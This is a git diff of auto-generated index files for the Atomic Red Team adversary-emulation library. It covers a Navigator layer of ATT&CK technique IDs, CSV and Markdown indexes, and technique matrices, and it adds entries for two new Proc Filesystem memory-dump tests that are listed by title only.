eID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0eda063b..e9d78206 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -64,6 +64,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5- credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index f06859b0..c9e1bb22 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -11,6 +11,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh +credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f6da33e1..bd9b1af6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -107,7 +107,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 2adc7269..678b261a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -37,7 +37,9 @@ - Atomic Test #2: Discover Private SSH Keys [macos, linux] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] -- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) + - Atomic Test #1: Dump individual process memory with sh (Local) [linux] + - Atomic Test #2: Dump individual process memory with Python (Local) [linux] - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 420df707..33891a6e 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -26,7 +26,7 @@ | | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index a8def1e4..acd405f4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -43,7 +43,7 @@ | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules 